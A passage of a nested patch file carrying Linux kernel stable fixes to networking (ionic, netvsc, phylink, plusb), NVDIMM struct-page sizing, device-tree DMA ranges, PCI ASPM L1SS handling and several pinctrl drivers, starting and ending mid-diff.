++	fill_threshold = min_t(unsigned int, IONIC_RX_FILL_THRESHOLD,
++			       q->num_descs / IONIC_RX_FILL_DIV);
++	if (n_fill < fill_threshold)
++		return;
++
+ 	len = netdev->mtu + ETH_HLEN + VLAN_HLEN;
+ 
+-	for (i = ionic_q_space_avail(q); i; i--) {
++	for (i = n_fill; i; i--) {
+ 		nfrags = 0;
+ 		remain_len = len;
+ 		desc_info = &q->info[q->head_idx];
+@@ -415,6 +485,12 @@ void ionic_rx_fill(struct ionic_queue *q)
+ 
+ 	ionic_dbell_ring(q->lif->kern_dbpage, q->hw_type,
+ 			 q->dbval | q->head_idx);
++
++	q->dbell_deadline = IONIC_RX_MIN_DOORBELL_DEADLINE;
++	q->dbell_jiffies = jiffies;
++
++	mod_timer(&q_to_qcq(q)->napi_qcq->napi_deadline,
++		  jiffies + IONIC_NAPI_DEADLINE);
+ }
+ 
+ void ionic_rx_empty(struct ionic_queue *q)
+@@ -502,6 +578,9 @@ int ionic_tx_napi(struct napi_struct *napi, int budget)
+ 				   work_done, flags);
+ 	}
+ 
++	if (!work_done && ionic_txq_poke_doorbell(&qcq->q))
++		mod_timer(&qcq->napi_deadline, jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return work_done;
+ }
+ 
+@@ -511,7 +590,6 @@ int ionic_rx_napi(struct napi_struct *napi, int budget)
+ 	struct ionic_cq *cq = napi_to_cq(napi);
+ 	struct ionic_dev *idev;
+ 	struct ionic_lif *lif;
+-	u16 rx_fill_threshold;
+ 	u32 work_done = 0;
+ 	u32 flags = 0;
+ 
+@@ -521,10 +599,7 @@ int ionic_rx_napi(struct napi_struct *napi, int budget)
+ 	work_done = ionic_cq_service(cq, budget,
+ 				     ionic_rx_service, NULL, NULL);
+ 
+-	rx_fill_threshold = min_t(u16, IONIC_RX_FILL_THRESHOLD,
+-				  cq->num_descs / IONIC_RX_FILL_DIV);
+-	if (work_done && ionic_q_space_avail(cq->bound_q) >= rx_fill_threshold)
+-		ionic_rx_fill(cq->bound_q);
++	ionic_rx_fill(cq->bound_q);
+ 
+ 	if (work_done < budget && napi_complete_done(napi, work_done)) {
+ 		ionic_dim_update(qcq, IONIC_LIF_F_RX_DIM_INTR);
+@@ -539,24 +614,29 @@ int ionic_rx_napi(struct napi_struct *napi, int budget)
+ 				   work_done, flags);
+ 	}
+ 
++	if (!work_done && ionic_rxq_poke_doorbell(&qcq->q))
++		mod_timer(&qcq->napi_deadline, jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return work_done;
+ }
+ 
+ int ionic_txrx_napi(struct napi_struct *napi, int budget)
+ {
+-	struct ionic_qcq *qcq = napi_to_qcq(napi);
++	struct ionic_qcq *rxqcq = napi_to_qcq(napi);
+ 	struct ionic_cq *rxcq = napi_to_cq(napi);
+ 	unsigned int qi = rxcq->bound_q->index;
++	struct ionic_qcq *txqcq;
+ 	struct ionic_dev *idev;
+ 	struct ionic_lif *lif;
+ 	struct ionic_cq *txcq;
+-	u16 rx_fill_threshold;
++	bool resched = false;
+ 	u32 rx_work_done = 0;
+ 	u32 tx_work_done = 0;
+ 	u32 flags = 0;
+ 
+ 	lif = rxcq->bound_q->lif;
+ 	idev = &lif->ionic->idev;
++	txqcq = lif->txqcqs[qi];
+ 	txcq = &lif->txqcqs[qi]->cq;
+ 
+ 	tx_work_done = ionic_cq_service(txcq, IONIC_TX_BUDGET_DEFAULT,
+@@ -565,13 +645,10 @@ int ionic_txrx_napi(struct napi_struct *napi, int budget)
+ 	rx_work_done = ionic_cq_service(rxcq, budget,
+ 					ionic_rx_service, NULL, NULL);
+ 
+-	rx_fill_threshold = min_t(u16, IONIC_RX_FILL_THRESHOLD,
+-				  rxcq->num_descs / IONIC_RX_FILL_DIV);
+-	if (rx_work_done && ionic_q_space_avail(rxcq->bound_q) >= rx_fill_threshold)
+-		ionic_rx_fill(rxcq->bound_q);
++	ionic_rx_fill(rxcq->bound_q);
+ 
+ 	if (rx_work_done < budget && napi_complete_done(napi, rx_work_done)) {
+-		ionic_dim_update(qcq, 0);
++		ionic_dim_update(rxqcq, 0);
+ 		flags |= IONIC_INTR_CRED_UNMASK;
+ 		rxcq->bound_intr->rearm_count++;
+ 	}
+@@ -582,6 +659,13 @@ int ionic_txrx_napi(struct napi_struct *napi, int budget)
+ 				   tx_work_done + rx_work_done, flags);
+ 	}
+ 
++	if (!rx_work_done && ionic_rxq_poke_doorbell(&rxqcq->q))
++		resched = true;
++	if (!tx_work_done && ionic_txq_poke_doorbell(&txqcq->q))
++		resched = true;
++	if (resched)
++		mod_timer(&rxqcq->napi_deadline, jiffies + IONIC_NAPI_DEADLINE);
++
+ 	return rx_work_done;
+ }
+ 
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index e02d1e3ef672a..79f4e13620a46 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -1034,7 +1034,7 @@ static int netvsc_dma_map(struct hv_device *hv_dev,
+ 
+ 	packet->dma_range = kcalloc(page_count,
+ 				    sizeof(*packet->dma_range),
+-				    GFP_KERNEL);
++				    GFP_ATOMIC);
+ 	if (!packet->dma_range)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/phy/meson-gxl.c b/drivers/net/phy/meson-gxl.c
+index 5e41658b1e2fa..a6015cd03bff8 100644
+--- a/drivers/net/phy/meson-gxl.c
++++ b/drivers/net/phy/meson-gxl.c
+@@ -261,6 +261,8 @@ static struct phy_driver meson_gxl_phy[] = {
+ 		.handle_interrupt = meson_gxl_handle_interrupt,
+ 		.suspend        = genphy_suspend,
+ 		.resume         = genphy_resume,
++		.read_mmd	= genphy_read_mmd_unsupported,
++		.write_mmd	= genphy_write_mmd_unsupported,
+ 	}, {
+ 		PHY_ID_MATCH_EXACT(0x01803301),
+ 		.name		= "Meson G12A Internal PHY",
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 2805b04d64028..a202ce6611fde 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1793,10 +1793,9 @@ int phylink_fwnode_phy_connect(struct phylink *pl,
+ 
+ 	ret = phy_attach_direct(pl->netdev, phy_dev, flags,
+ 				pl->link_interface);
+-	if (ret) {
+-		phy_device_free(phy_dev);
++	phy_device_free(phy_dev);
++	if (ret)
+ 		return ret;
+-	}
+ 
+ 	ret = phylink_bringup_phy(pl, phy_dev, pl->link_config.interface);
+ 	if (ret)
+diff --git a/drivers/net/usb/plusb.c b/drivers/net/usb/plusb.c
+index 2c82fbcaab223..7a2b0094de51f 100644
+--- a/drivers/net/usb/plusb.c
++++ b/drivers/net/usb/plusb.c
+@@ -57,9 +57,7 @@
+ static inline int
+ pl_vendor_req(struct usbnet *dev, u8 req, u8 val, u8 index)
+ {
+-	return usbnet_read_cmd(dev, req,
+-				USB_DIR_IN | USB_TYPE_VENDOR |
+-				USB_RECIP_DEVICE,
++	return usbnet_write_cmd(dev, req, USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 				val, index, NULL, 0);
+ }
+ 
+diff --git a/drivers/nvdimm/Kconfig b/drivers/nvdimm/Kconfig
+index 5a29046e3319d..e4c20f0cb0494 100644
+--- a/drivers/nvdimm/Kconfig
++++ b/drivers/nvdimm/Kconfig
+@@ -102,6 +102,25 @@ config NVDIMM_KEYS
+ 	depends on ENCRYPTED_KEYS
+ 	depends on (LIBNVDIMM=ENCRYPTED_KEYS) || LIBNVDIMM=m
+ 
++config NVDIMM_KMSAN
++	bool
++	depends on KMSAN
++	help
++	  KMSAN, and other memory debug facilities, increase the size of
++	  'struct page' to contain extra metadata. This collides with
++	  the NVDIMM capability to store a potentially
++	  larger-than-"System RAM" size 'struct page' array in a
++	  reservation of persistent memory rather than limited /
++	  precious DRAM. However, that reservation needs to persist for
++	  the life of the given NVDIMM namespace. If you are using KMSAN
++	  to debug an issue unrelated to NVDIMMs or DAX then say N to this
++	  option. Otherwise, say Y but understand that any namespaces
++	  (with the page array stored pmem) created with this build of
++	  the kernel will permanently reserve and strand excess
++	  capacity compared to the CONFIG_KMSAN=n case.
++
++	  Select N if unsure.
++
+ config NVDIMM_TEST_BUILD
+ 	tristate "Build the unit test core"
+ 	depends on m
+diff --git a/drivers/nvdimm/nd.h b/drivers/nvdimm/nd.h
+index 85ca5b4da3cf3..ec5219680092d 100644
+--- a/drivers/nvdimm/nd.h
++++ b/drivers/nvdimm/nd.h
+@@ -652,7 +652,7 @@ void devm_namespace_disable(struct device *dev,
+ 		struct nd_namespace_common *ndns);
+ #if IS_ENABLED(CONFIG_ND_CLAIM)
+ /* max struct page size independent of kernel config */
+-#define MAX_STRUCT_PAGE_SIZE 128
++#define MAX_STRUCT_PAGE_SIZE 64
+ int nvdimm_setup_pfn(struct nd_pfn *nd_pfn, struct dev_pagemap *pgmap);
+ #else
+ static inline int nvdimm_setup_pfn(struct nd_pfn *nd_pfn,
+diff --git a/drivers/nvdimm/pfn_devs.c b/drivers/nvdimm/pfn_devs.c
+index 61af072ac98f9..af7d9301520c5 100644
+--- a/drivers/nvdimm/pfn_devs.c
++++ b/drivers/nvdimm/pfn_devs.c
+@@ -13,6 +13,8 @@
+ #include "pfn.h"
+ #include "nd.h"
+ 
++static const bool page_struct_override = IS_ENABLED(CONFIG_NVDIMM_KMSAN);
++
+ static void nd_pfn_release(struct device *dev)
+ {
+ 	struct nd_region *nd_region = to_nd_region(dev->parent);
+@@ -758,12 +760,6 @@ static int nd_pfn_init(struct nd_pfn *nd_pfn)
+ 		return -ENXIO;
+ 	}
+ 
+-	/*
+-	 * Note, we use 64 here for the standard size of struct page,
+-	 * debugging options may cause it to be larger in which case the
+-	 * implementation will limit the pfns advertised through
+-	 * ->direct_access() to those that are included in the memmap.
+-	 */
+ 	start = nsio->res.start;
+ 	size = resource_size(&nsio->res);
+ 	npfns = PHYS_PFN(size - SZ_8K);
+@@ -782,20 +778,33 @@ static int nd_pfn_init(struct nd_pfn *nd_pfn)
+ 	}
+ 	end_trunc = start + size - ALIGN_DOWN(start + size, align);
+ 	if (nd_pfn->mode == PFN_MODE_PMEM) {
++		unsigned long page_map_size = MAX_STRUCT_PAGE_SIZE * npfns;
++
+ 		/*
+ 		 * The altmap should be padded out to the block size used
+ 		 * when populating the vmemmap. This *should* be equal to
+ 		 * PMD_SIZE for most architectures.
+ 		 *
+-		 * Also make sure size of struct page is less than 128. We
+-		 * want to make sure we use large enough size here so that
+-		 * we don't have a dynamic reserve space depending on
+-		 * struct page size. But we also want to make sure we notice
+-		 * when we end up adding new elements to struct page.
++		 * Also make sure size of struct page is less than
++		 * MAX_STRUCT_PAGE_SIZE. The goal here is compatibility in the
++		 * face of production kernel configurations that reduce the
++		 * 'struct page' size below MAX_STRUCT_PAGE_SIZE. For debug
++		 * kernel configurations that increase the 'struct page' size
++		 * above MAX_STRUCT_PAGE_SIZE, the page_struct_override allows
++		 * for continuing with the capacity that will be wasted when
++		 * reverting to a production kernel configuration. Otherwise,
++		 * those configurations are blocked by default.
+ 		 */
+-		BUILD_BUG_ON(sizeof(struct page) > MAX_STRUCT_PAGE_SIZE);
+-		offset = ALIGN(start + SZ_8K + MAX_STRUCT_PAGE_SIZE * npfns, align)
+-			- start;
++		if (sizeof(struct page) > MAX_STRUCT_PAGE_SIZE) {
++			if (page_struct_override)
++				page_map_size = sizeof(struct page) * npfns;
++			else {
++				dev_err(&nd_pfn->dev,
++					"Memory debug options prevent using pmem for the page map\n");
++				return -EINVAL;
++			}
++		}
++		offset = ALIGN(start + SZ_8K + page_map_size, align) - start;
+ 	} else if (nd_pfn->mode == PFN_MODE_RAM)
+ 		offset = ALIGN(start + SZ_8K, align) - start;
+ 	else
+@@ -818,7 +827,10 @@ static int nd_pfn_init(struct nd_pfn *nd_pfn)
+ 	pfn_sb->version_minor = cpu_to_le16(4);
+ 	pfn_sb->end_trunc = cpu_to_le32(end_trunc);
+ 	pfn_sb->align = cpu_to_le32(nd_pfn->align);
+-	pfn_sb->page_struct_size = cpu_to_le16(MAX_STRUCT_PAGE_SIZE);
++	if (sizeof(struct page) > MAX_STRUCT_PAGE_SIZE && page_struct_override)
++		pfn_sb->page_struct_size = cpu_to_le16(sizeof(struct page));
++	else
++		pfn_sb->page_struct_size = cpu_to_le16(MAX_STRUCT_PAGE_SIZE);
+ 	pfn_sb->page_size = cpu_to_le32(PAGE_SIZE);
+ 	checksum = nd_sb_checksum((struct nd_gen_sb *) pfn_sb);
+ 	pfn_sb->checksum = cpu_to_le64(checksum);
+diff --git a/drivers/of/address.c b/drivers/of/address.c
+index c34ac33b7338a..67763e5b8c0ef 100644
+--- a/drivers/of/address.c
++++ b/drivers/of/address.c
+@@ -965,8 +965,19 @@ int of_dma_get_range(struct device_node *np, const struct bus_dma_region **map)
+ 	}
+ 
+ 	of_dma_range_parser_init(&parser, node);
+-	for_each_of_range(&parser, &range)
++	for_each_of_range(&parser, &range) {
++		if (range.cpu_addr == OF_BAD_ADDR) {
++			pr_err("translation of DMA address(%llx) to CPU address failed node(%pOF)\n",
++			       range.bus_addr, node);
++			continue;
++		}
+ 		num_ranges++;
++	}
++
++	if (!num_ranges) {
++		ret = -EINVAL;
++		goto out;
++	}
+ 
+ 	r = kcalloc(num_ranges + 1, sizeof(*r), GFP_KERNEL);
+ 	if (!r) {
+@@ -975,18 +986,16 @@ int of_dma_get_range(struct device_node *np, const struct bus_dma_region **map)
+ 	}
+ 
+ 	/*
+-	 * Record all info in the generic DMA ranges array for struct device.
++	 * Record all info in the generic DMA ranges array for struct device,
++	 * returning an error if we don't find any parsable ranges.
+ 	 */
+ 	*map = r;
+ 	of_dma_range_parser_init(&parser, node);
+ 	for_each_of_range(&parser, &range) {
+ 		pr_debug("dma_addr(%llx) cpu_addr(%llx) size(%llx)\n",
+ 			 range.bus_addr, range.cpu_addr, range.size);
+-		if (range.cpu_addr == OF_BAD_ADDR) {
+-			pr_err("translation of DMA address(%llx) to CPU address failed node(%pOF)\n",
+-			       range.bus_addr, node);
++		if (range.cpu_addr == OF_BAD_ADDR)
+ 			continue;
+-		}
+ 		r->cpu_start = range.cpu_addr;
+ 		r->dma_start = range.bus_addr;
+ 		r->size = range.size;
+diff --git a/drivers/of/platform.c b/drivers/of/platform.c
+index 3507095a69f69..6e93fd37ccd1a 100644
+--- a/drivers/of/platform.c
++++ b/drivers/of/platform.c
+@@ -526,6 +526,7 @@ static int __init of_platform_default_populate_init(void)
+ 	if (IS_ENABLED(CONFIG_PPC)) {
+ 		struct device_node *boot_display = NULL;
+ 		struct platform_device *dev;
++		int display_number = 0;
+ 		int ret;
+ 
+ 		/* Check if we have a MacOS display without a node spec */
+@@ -556,16 +557,23 @@ static int __init of_platform_default_populate_init(void)
+ 			if (!of_get_property(node, "linux,opened", NULL) ||
+ 			    !of_get_property(node, "linux,boot-display", NULL))
+ 				continue;
+-			dev = of_platform_device_create(node, "of-display", NULL);
++			dev = of_platform_device_create(node, "of-display.0", NULL);
++			of_node_put(node);
+ 			if (WARN_ON(!dev))
+ 				return -ENOMEM;
+ 			boot_display = node;
++			display_number++;
+ 			break;
+ 		}
+ 		for_each_node_by_type(node, "display") {
++			char buf[14];
++			const char *of_display_format = "of-display.%d";
++
+ 			if (!of_get_property(node, "linux,opened", NULL) || node == boot_display)
+ 				continue;
+-			of_platform_device_create(node, "of-display", NULL);
++			ret = snprintf(buf, sizeof(buf), of_display_format, display_number++);
++			if (ret < sizeof(buf))
++				of_platform_device_create(node, buf, NULL);
+ 		}
+ 
+ 	} else {
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index ab615ab4e4409..6d81df459b2f0 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -1665,7 +1665,6 @@ int pci_save_state(struct pci_dev *dev)
+ 		return i;
+ 
+ 	pci_save_ltr_state(dev);
+-	pci_save_aspm_l1ss_state(dev);
+ 	pci_save_dpc_state(dev);
+ 	pci_save_aer_state(dev);
+ 	pci_save_ptm_state(dev);
+@@ -1772,7 +1771,6 @@ void pci_restore_state(struct pci_dev *dev)
+ 	 * LTR itself (in the PCIe capability).
+ 	 */
+ 	pci_restore_ltr_state(dev);
+-	pci_restore_aspm_l1ss_state(dev);
+ 
+ 	pci_restore_pcie_state(dev);
+ 	pci_restore_pasid_state(dev);
+@@ -3465,11 +3463,6 @@ void pci_allocate_cap_save_buffers(struct pci_dev *dev)
+ 	if (error)
+ 		pci_err(dev, "unable to allocate suspend buffer for LTR\n");
+ 
+-	error = pci_add_ext_cap_save_buffer(dev, PCI_EXT_CAP_ID_L1SS,
+-					    2 * sizeof(u32));
+-	if (error)
+-		pci_err(dev, "unable to allocate suspend buffer for ASPM-L1SS\n");
+-
+ 	pci_allocate_vc_save_buffers(dev);
+ }
+ 
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index b1ebb7ab88051..ce169b12a8f6d 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -565,14 +565,10 @@ bool pcie_wait_for_link(struct pci_dev *pdev, bool active);
+ void pcie_aspm_init_link_state(struct pci_dev *pdev);
+ void pcie_aspm_exit_link_state(struct pci_dev *pdev);
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev);
+-void pci_save_aspm_l1ss_state(struct pci_dev *dev);
+-void pci_restore_aspm_l1ss_state(struct pci_dev *dev);
+ #else
+ static inline void pcie_aspm_init_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_exit_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_powersave_config_link(struct pci_dev *pdev) { }
+-static inline void pci_save_aspm_l1ss_state(struct pci_dev *dev) { }
+-static inline void pci_restore_aspm_l1ss_state(struct pci_dev *dev) { }
+ #endif
+ 
+ #ifdef CONFIG_PCIE_ECRC
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 53a1fa306e1ee..4b4184563a927 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -470,31 +470,6 @@ static void pci_clear_and_set_dword(struct pci_dev *pdev, int pos,
+ 	pci_write_config_dword(pdev, pos, val);
+ }
+ 
+-static void aspm_program_l1ss(struct pci_dev *dev, u32 ctl1, u32 ctl2)
+-{
+-	u16 l1ss = dev->l1ss;
+-	u32 l1_2_enable;
+-
+-	/*
+-	 * Per PCIe r6.0, sec 5.5.4, T_POWER_ON in PCI_L1SS_CTL2 must be
+-	 * programmed prior to setting the L1.2 enable bits in PCI_L1SS_CTL1.
+-	 */
+-	pci_write_config_dword(dev, l1ss + PCI_L1SS_CTL2, ctl2);
+-
+-	/*
+-	 * In addition, Common_Mode_Restore_Time and LTR_L1.2_THRESHOLD in
+-	 * PCI_L1SS_CTL1 must be programmed *before* setting the L1.2
+-	 * enable bits, even though they're all in PCI_L1SS_CTL1.
+-	 */
+-	l1_2_enable = ctl1 & PCI_L1SS_CTL1_L1_2_MASK;
+-	ctl1 &= ~PCI_L1SS_CTL1_L1_2_MASK;
+-
+-	pci_write_config_dword(dev, l1ss + PCI_L1SS_CTL1, ctl1);
+-	if (l1_2_enable)
+-		pci_write_config_dword(dev, l1ss + PCI_L1SS_CTL1,
+-				       ctl1 | l1_2_enable);
+-}
+-
+ /* Calculate L1.2 PM substate timing parameters */
+ static void aspm_calc_l1ss_info(struct pcie_link_state *link,
+ 				u32 parent_l1ss_cap, u32 child_l1ss_cap)
+@@ -504,6 +479,7 @@ static void aspm_calc_l1ss_info(struct pcie_link_state *link,
+ 	u32 t_common_mode, t_power_on, l1_2_threshold, scale, value;
+ 	u32 ctl1 = 0, ctl2 = 0;
+ 	u32 pctl1, pctl2, cctl1, cctl2;
++	u32 pl1_2_enables, cl1_2_enables;
+ 
+ 	if (!(link->aspm_support & ASPM_STATE_L1_2_MASK))
+ 		return;
+@@ -552,21 +528,39 @@ static void aspm_calc_l1ss_info(struct pcie_link_state *link,
+ 	    ctl2 == pctl2 && ctl2 == cctl2)
+ 		return;
+ 
+-	pctl1 &= ~(PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_SCALE);
+-	pctl1 |= (ctl1 & (PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_SCALE));
+-	aspm_program_l1ss(parent, pctl1, ctl2);
+-
+-	cctl1 &= ~(PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-		   PCI_L1SS_CTL1_LTR_L12_TH_SCALE);
+-	cctl1 |= (ctl1 & (PCI_L1SS_CTL1_CM_RESTORE_TIME |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
+-			  PCI_L1SS_CTL1_LTR_L12_TH_SCALE));
+-	aspm_program_l1ss(child, cctl1, ctl2);
++	/* Disable L1.2 while updating.  See PCIe r5.0, sec 5.5.4, 7.8.3.3 */
++	pl1_2_enables = pctl1 & PCI_L1SS_CTL1_L1_2_MASK;
++	cl1_2_enables = cctl1 & PCI_L1SS_CTL1_L1_2_MASK;
++
++	if (pl1_2_enables || cl1_2_enables) {
++		pci_clear_and_set_dword(child, child->l1ss + PCI_L1SS_CTL1,
++					PCI_L1SS_CTL1_L1_2_MASK, 0);
++		pci_clear_and_set_dword(parent, parent->l1ss + PCI_L1SS_CTL1,
++					PCI_L1SS_CTL1_L1_2_MASK, 0);
++	}
++
++	/* Program T_POWER_ON times in both ports */
++	pci_write_config_dword(parent, parent->l1ss + PCI_L1SS_CTL2, ctl2);
++	pci_write_config_dword(child, child->l1ss + PCI_L1SS_CTL2, ctl2);
++
++	/* Program Common_Mode_Restore_Time in upstream device */
++	pci_clear_and_set_dword(parent, parent->l1ss + PCI_L1SS_CTL1,
++				PCI_L1SS_CTL1_CM_RESTORE_TIME, ctl1);
++
++	/* Program LTR_L1.2_THRESHOLD time in both ports */
++	pci_clear_and_set_dword(parent,	parent->l1ss + PCI_L1SS_CTL1,
++				PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
++				PCI_L1SS_CTL1_LTR_L12_TH_SCALE, ctl1);
++	pci_clear_and_set_dword(child, child->l1ss + PCI_L1SS_CTL1,
++				PCI_L1SS_CTL1_LTR_L12_TH_VALUE |
++				PCI_L1SS_CTL1_LTR_L12_TH_SCALE, ctl1);
++
++	if (pl1_2_enables || cl1_2_enables) {
++		pci_clear_and_set_dword(parent, parent->l1ss + PCI_L1SS_CTL1, 0,
++					pl1_2_enables);
++		pci_clear_and_set_dword(child, child->l1ss + PCI_L1SS_CTL1, 0,
++					cl1_2_enables);
++	}
+ }
+ 
+ static void aspm_l1ss_init(struct pcie_link_state *link)
+@@ -757,43 +751,6 @@ static void pcie_config_aspm_l1ss(struct pcie_link_state *link, u32 state)
+ 				PCI_L1SS_CTL1_L1SS_MASK, val);
+ }
+ 
+-void pci_save_aspm_l1ss_state(struct pci_dev *dev)
+-{
+-	struct pci_cap_saved_state *save_state;
+-	u16 l1ss = dev->l1ss;
+-	u32 *cap;
+-
+-	if (!l1ss)
+-		return;
+-
+-	save_state = pci_find_saved_ext_cap(dev, PCI_EXT_CAP_ID_L1SS);
+-	if (!save_state)
+-		return;
+-
+-	cap = (u32 *)&save_state->cap.data[0];
+-	pci_read_config_dword(dev, l1ss + PCI_L1SS_CTL2, cap++);
+-	pci_read_config_dword(dev, l1ss + PCI_L1SS_CTL1, cap++);
+-}
+-
+-void pci_restore_aspm_l1ss_state(struct pci_dev *dev)
+-{
+-	struct pci_cap_saved_state *save_state;
+-	u32 *cap, ctl1, ctl2;
+-	u16 l1ss = dev->l1ss;
+-
+-	if (!l1ss)
+-		return;
+-
+-	save_state = pci_find_saved_ext_cap(dev, PCI_EXT_CAP_ID_L1SS);
+-	if (!save_state)
+-		return;
+-
+-	cap = (u32 *)&save_state->cap.data[0];
+-	ctl2 = *cap++;
+-	ctl1 = *cap;
+-	aspm_program_l1ss(dev, ctl1, ctl2);
+-}
+-
+ static void pcie_config_aspm_dev(struct pci_dev *pdev, u32 val)
+ {
+ 	pcie_capability_clear_and_set_word(pdev, PCI_EXP_LNKCTL,
+diff --git a/drivers/pinctrl/aspeed/pinctrl-aspeed.c b/drivers/pinctrl/aspeed/pinctrl-aspeed.c
+index a30912a92f057..5a12fc7cf91fb 100644
+--- a/drivers/pinctrl/aspeed/pinctrl-aspeed.c
++++ b/drivers/pinctrl/aspeed/pinctrl-aspeed.c
+@@ -92,10 +92,19 @@ static int aspeed_sig_expr_enable(struct aspeed_pinmux_data *ctx,
+ static int aspeed_sig_expr_disable(struct aspeed_pinmux_data *ctx,
+ 				   const struct aspeed_sig_expr *expr)
+ {
++	int ret;
++
+ 	pr_debug("Disabling signal %s for %s\n", expr->signal,
+ 		 expr->function);
+ 
+-	return aspeed_sig_expr_set(ctx, expr, false);
++	ret = aspeed_sig_expr_eval(ctx, expr, true);
++	if (ret < 0)
++		return ret;
++
++	if (ret)
++		return aspeed_sig_expr_set(ctx, expr, false);
++
++	return 0;
+ }
+ 
+ /**
+@@ -113,7 +122,7 @@ static int aspeed_disable_sig(struct aspeed_pinmux_data *ctx,
+ 	int ret = 0;
+ 
+ 	if (!exprs)
+-		return true;
++		return -EINVAL;
+ 
+ 	while (*exprs && !ret) {
+ 		ret = aspeed_sig_expr_disable(ctx, *exprs);
+diff --git a/drivers/pinctrl/intel/pinctrl-intel.c b/drivers/pinctrl/intel/pinctrl-intel.c
+index 047a8374b4fdc..954a412267402 100644
+--- a/drivers/pinctrl/intel/pinctrl-intel.c
++++ b/drivers/pinctrl/intel/pinctrl-intel.c
+@@ -1676,6 +1676,12 @@ const struct intel_pinctrl_soc_data *intel_pinctrl_get_soc_data(struct platform_
+ EXPORT_SYMBOL_GPL(intel_pinctrl_get_soc_data);
+ 
+ #ifdef CONFIG_PM_SLEEP
++static bool __intel_gpio_is_direct_irq(u32 value)
++{
++	return (value & PADCFG0_GPIROUTIOXAPIC) && (value & PADCFG0_GPIOTXDIS) &&
++	       (__intel_gpio_get_gpio_mode(value) == PADCFG0_PMODE_GPIO);
++}
++
+ static bool intel_pinctrl_should_save(struct intel_pinctrl *pctrl, unsigned int pin)
+ {
+ 	const struct pin_desc *pd = pin_desc_get(pctrl->pctldev, pin);
+@@ -1709,8 +1715,7 @@ static bool intel_pinctrl_should_save(struct intel_pinctrl *pctrl, unsigned int
+ 	 * See https://bugzilla.kernel.org/show_bug.cgi?id=214749.
+ 	 */
+ 	value = readl(intel_get_padcfg(pctrl, pin, PADCFG0));
+-	if ((value & PADCFG0_GPIROUTIOXAPIC) && (value & PADCFG0_GPIOTXDIS) &&
+-	    (__intel_gpio_get_gpio_mode(value) == PADCFG0_PMODE_GPIO))
++	if (__intel_gpio_is_direct_irq(value))
+ 		return true;
+ 
+ 	return false;
+@@ -1840,7 +1845,12 @@ int intel_pinctrl_resume_noirq(struct device *dev)
+ 	for (i = 0; i < pctrl->soc->npins; i++) {
+ 		const struct pinctrl_pin_desc *desc = &pctrl->soc->pins[i];
+ 
+-		if (!intel_pinctrl_should_save(pctrl, desc->number))
++		if (!(intel_pinctrl_should_save(pctrl, desc->number) ||
++		      /*
++		       * If the firmware mangled the register contents too much,
++		       * check the saved value for the Direct IRQ mode.
++		       */
++		      __intel_gpio_is_direct_irq(pads[i].padcfg0)))
+ 			continue;
+ 
+ 		intel_restore_padcfg(pctrl, desc->number, PADCFG0, pads[i].padcfg0);
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt8195.c b/drivers/pinctrl/mediatek/pinctrl-mt8195.c
+index 89557c7ed2ab0..09c4dcef93383 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt8195.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt8195.c
+@@ -659,7 +659,7 @@ static const struct mtk_pin_field_calc mt8195_pin_drv_range[] = {
+ 	PIN_FIELD_BASE(10, 10, 4, 0x010, 0x10, 9, 3),
+ 	PIN_FIELD_BASE(11, 11, 4, 0x000, 0x10, 24, 3),
+ 	PIN_FIELD_BASE(12, 12, 4, 0x010, 0x10, 12, 3),
+-	PIN_FIELD_BASE(13, 13, 4, 0x010, 0x10, 27, 3),
++	PIN_FIELD_BASE(13, 13, 4, 0x000, 0x10, 27, 3),
+ 	PIN_FIELD_BASE(14, 14, 4, 0x010, 0x10, 15, 3),
+ 	PIN_FIELD_BASE(15, 15, 4, 0x010, 0x10, 0, 3),
+ 	PIN_FIELD_BASE(16, 16, 4, 0x010, 0x10, 18, 3),
+@@ -708,7 +708,7 @@ static const struct mtk_pin_field_calc mt8195_pin_drv_range[] = {
+ 	PIN_FIELD_BASE(78, 78, 3, 0x000, 0x10, 15, 3),
+ 	PIN_FIELD_BASE(79, 79, 3, 0x000, 0x10, 18, 3),
+ 	PIN_FIELD_BASE(80, 80, 3, 0x000, 0x10, 21, 3),
+-	PIN_FIELD_BASE(81, 81, 3, 0x000, 0x10, 28, 3),
++	PIN_FIELD_BASE(81, 81, 3, 0x000, 0x10, 24, 3),
+ 	PIN_FIELD_BASE(82, 82, 3, 0x000, 0x10, 27, 3),
+ 	PIN_FIELD_BASE(83, 83, 3, 0x010, 0x10, 0, 3),
+ 	PIN_FIELD_BASE(84, 84, 3, 0x010, 0x10, 3, 3),
+diff --git a/drivers/pinctrl/pinctrl-single.c b/drivers/pinctrl/pinctrl-single.c
+index 414ee6bb8ac98..9ad8f70206142 100644
+--- a/drivers/pinctrl/pinctrl-single.c
